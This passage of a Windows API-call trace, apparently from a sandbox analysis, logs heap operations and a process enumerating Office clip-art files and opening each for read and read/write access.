(in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0103.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35250 [0103.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0103.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35250 | out: hHeap=0x20000) returned 1 [0103.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0103.676] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0103.676] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0103.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0103.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0103.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0103.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0103.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f0b8 [0103.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0103.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0103.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8af48 [0103.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f0b8 | out: hHeap=0x20000) returned 1 [0103.677] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.677] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.677] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.677] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8af48 | out: hHeap=0x20000) returned 1 [0103.677] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0103.677] AreFileApisANSI () returned 1 [0103.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CARBN_01.MID", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CARBN_01.MID", lpUsedDefaultChar=0x0) returned 69 [0103.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0103.677] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.677] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0103.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0103.677] AreFileApisANSI () returned 1 [0103.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.677] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8b110 [0103.677] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x8b110, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 69 [0103.677] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CARBN_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\carbn_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0103.678] GetFileType (hFile=0x27c) returned 0x1 [0103.678] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b110 | out: hHeap=0x20000) returned 1 [0103.678] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.678] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.679] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.679] CloseHandle (hObject=0x27c) returned 1 [0103.679] AreFileApisANSI () returned 1 [0103.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8aeb0 [0103.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x8aeb0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 69 [0103.679] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CARBN_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\carbn_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0103.679] GetFileType (hFile=0x27c) returned 0x1 [0103.679] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0103.679] CloseHandle (hObject=0x27c) returned 1 [0103.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0103.679] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0103.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0103.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0103.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0103.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0103.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0103.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0103.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0103.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0103.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0103.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0103.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0103.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0103.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0103.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0103.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0103.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0103.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0103.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.680] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0103.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0103.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0103.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0103.680] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0103.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0103.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0103.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.681] AreFileApisANSI () returned 1 [0103.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0103.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a660 [0103.681] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d6e0, cbMultiByte=-1, lpWideCharStr=0x8a660, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 69 [0103.681] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CARBN_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\carbn_01.mid"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd71e4b4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd71e4b4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd71e4b4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x246a)) returned 1 [0103.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0103.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0103.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0103.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0103.681] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.681] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.681] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd71e4b4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd71e4b4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd744774, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xdec, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="CG1606.WMF", cAlternateFileName="")) returned 1 [0103.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0103.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0103.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0103.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0103.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0103.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0103.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0103.681] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0103.681] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0103.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35010 [0103.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0103.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35010 | out: hHeap=0x20000) returned 1 [0103.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0103.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f9a8 [0103.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0103.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ac50 [0103.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f9a8 | out: hHeap=0x20000) returned 1 [0103.682] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.682] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.682] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.682] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ac50 | out: hHeap=0x20000) returned 1 [0103.682] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.682] AreFileApisANSI () returned 1 [0103.682] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CG1606.WMF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CG1606.WMF", lpUsedDefaultChar=0x0) returned 67 [0103.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0103.682] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.682] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0103.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0103.682] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0103.683] AreFileApisANSI () returned 1 [0103.683] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 67 [0103.683] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x86) returned 0x82298 [0103.683] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x82298, cchWideChar=67 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CG1606.WMF") returned 67 [0103.683] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CG1606.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cg1606.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0103.683] GetFileType (hFile=0x27c) returned 0x1 [0103.683] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82298 | out: hHeap=0x20000) returned 1 [0103.683] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0103.683] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0103.683] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0103.684] CloseHandle (hObject=0x27c) returned 1 [0103.684] AreFileApisANSI () returned 1 [0103.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 67 [0103.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x86) returned 0x82208 [0103.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x82208, cchWideChar=67 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CG1606.WMF") returned 67 [0103.684] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CG1606.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cg1606.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0103.684] GetFileType (hFile=0x27c) returned 0x1 [0103.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x82208 | out: hHeap=0x20000) returned 1 [0103.684] CloseHandle (hObject=0x27c) returned 1 [0103.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.684] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0103.684] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0103.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0103.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0103.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0103.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0103.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0103.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0103.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0103.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0103.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0103.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0103.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0103.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0103.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0103.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0103.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0103.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0103.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0103.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0103.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0103.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0103.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0103.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0103.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0103.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0103.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0103.685] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0103.685] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0103.686] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0103.686] AreFileApisANSI () returned 1 [0103.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 67 [0103.686] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x86) returned 0x82718 [0103.686] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d058, cbMultiByte=-1, lpWideCharStr=0x82718, cchWideChar=67 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CG1606.WMF") returned 67 [0103.686] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft 